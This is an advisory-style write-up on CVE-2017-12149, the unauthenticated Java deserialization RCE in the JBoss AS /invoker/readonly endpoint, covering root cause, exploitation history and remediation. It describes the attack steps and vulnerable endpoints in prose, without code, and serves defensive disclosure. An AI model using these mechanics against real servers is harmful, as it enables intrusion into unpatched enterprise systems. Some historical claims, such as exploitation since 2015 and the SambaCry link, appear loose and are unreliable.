CVE-2017-12149

What Is JBoss Application Server?

Red Hat JBoss Application Server (JBoss AS), now known as WildFly, is an open-source Java EE application server used by enterprise organizations worldwide for mission-critical Java applications. JBoss AS 5.x and 6.x (shipped as Red Hat Enterprise Application Platform 5.2) were widely deployed in financial services, healthcare, government, and manufacturing. JBoss servers run with broad access to internal networks, databases, and backend systems — a compromised JBoss instance provides an attacker with extensive enterprise access. The /invoker/ URL path on JBoss provided a Java serialization-based RPC mechanism intended for internal cluster communication that, when left exposed and unauthenticated, became an unauthenticated RCE endpoint accessible from the internet.

Overview

CVE-2017-12149 is a critical unauthenticated remote code execution vulnerability in JBoss Application Server (JBoss AS 5.x and 6.x, shipped in Red Hat EAP 5.2) caused by unsafe Java deserialization at the /invoker/readonly HTTP endpoint. The endpoint accepts and deserializes Java-serialized objects from unauthenticated HTTP requests — any attacker who can reach the JBoss HTTP port can send a malicious serialized payload that executes arbitrary code as the JBoss server process. This vulnerability has been exploited since at least 2015 for cryptomining, botnet recruitment, and ransomware delivery, and continues to be exploited against unpatched legacy JBoss deployments. CISA added CVE-2017-12149 to the KEV catalog in December 2021.

Affected Versions

Technical Details

Root Cause: Unauthenticated Java Deserialization on /invoker/readonly

CVE-2017-12149 is a deserialization vulnerability (CWE-502) in JBoss Application Server. The /invoker/ URL paths on JBoss AS 5.x/6.x expose an HTTP-accessible JMX invoker for remote Java management — designed for internal cluster management but often left accessible without authentication:

Vulnerable endpoints:

• /invoker/readonly — HTTP invoker endpoint that deserializes MarshalledInvocation objects
• /invoker/JMXInvokerServlet — JNDI-based invoker with similar deserialization

Attack mechanics:

1. Attacker sends an HTTP POST to /invoker/readonly on the target JBoss server
2. The request body contains a Java-serialized MarshalledInvocation object wrapping a malicious gadget chain payload (typically using Apache Commons Collections, Groovy, or similar libraries available on the JBoss classpath)
3. JBoss deserializes the payload using Java ObjectInputStream without any authentication check or class filtering
4. The gadget chain executes during deserialization, running arbitrary OS commands as the JBoss process user (often root or a highly privileged service account)

Why JBoss AS was particularly vulnerable:

• JBoss AS 5.x/6.x shipped with Apache Commons Collections on the default classpath — providing reliable gadget chains for deserialization exploitation
• The /invoker/readonly endpoint was accessible over HTTP (port 8080) without authentication by default
• JBoss servers were frequently internet-exposed to allow remote access to Java EE applications

Attack Characteristics

Discovery

The exploitability of JBoss's /invoker/readonly endpoint was known to security researchers well before the 2017 CVE assignment; exploitation was observed in the wild as early as 2015 for botnet recruitment. The CVE was formally assigned in 2017 when mass exploitation reached significant scale.

Exploitation Context

• Pre-CVE exploitation history: The JBoss deserialization attack path was publicly known and actively exploited for botnet recruitment (SambaCry, Mirai variants for servers) before the formal CVE assignment; CISA's 2021 KEV addition reflects the ongoing exploitation of legacy JBoss installations rather than a new discovery
• Cryptomining campaigns: The 2017-2018 cryptomining epidemic heavily targeted JBoss AS servers — the combination of server-grade hardware, persistent availability, and unauthenticated RCE made JBoss ideal for Monero mining; automated scanners identified and compromised vulnerable instances within hours of exposure
• Ransomware deployment: Ransomware operators used CVE-2017-12149 for initial access to enterprise networks via exposed JBoss servers, gaining foothold in the server tier before moving laterally to encrypt domain-joined systems; the ransomwareUse: true flag confirms these campaigns
• Legacy deployment persistence: JBoss AS 5.x/6.x reached end of life before 2017, yet many organizations continued running these versions for legacy Java EE applications; the CISA KEV addition in 2021 — four years after the CVE — reflects confirmed ongoing exploitation of organizations that never patched or migrated their JBoss deployments
• CISA KEV (2021): Added December 10, 2021 as part of a batch of Java deserialization CVEs with confirmed ongoing exploitation

Remediation

1. Apply Red Hat EAP patches — apply Red Hat security errata for JBoss EAP 5.2 to address CVE-2017-12149. Red Hat provides patch details via the Red Hat Customer Portal for supported EAP versions.

2. Migrate off JBoss AS 5.x/6.x — both versions are end-of-life and no longer receive security updates; migrate applications to JBoss EAP 7.x, WildFly, or another supported Java EE/Jakarta EE application server.

3. Immediately block or remove invoker servlets — if upgrading is not immediately possible, remove or restrict access to the vulnerable endpoints:

   • Remove the /invoker/ servlets from the JBoss deployment configuration
   • Block HTTP access to port 8080 (and 4444, 4445, 8009) at the firewall level from untrusted networks

4. Do not expose JBoss directly to the internet — JBoss application servers should be behind a load balancer, reverse proxy, or WAF; direct internet exposure of the JBoss HTTP port is the primary enabler of CVE-2017-12149 exploitation.

5. Audit for compromise — JBoss servers exposed without authentication should be treated as potentially compromised; check for unexpected processes (miners, shells), new cron jobs, modified WAR files, and webshells in the deployment directories.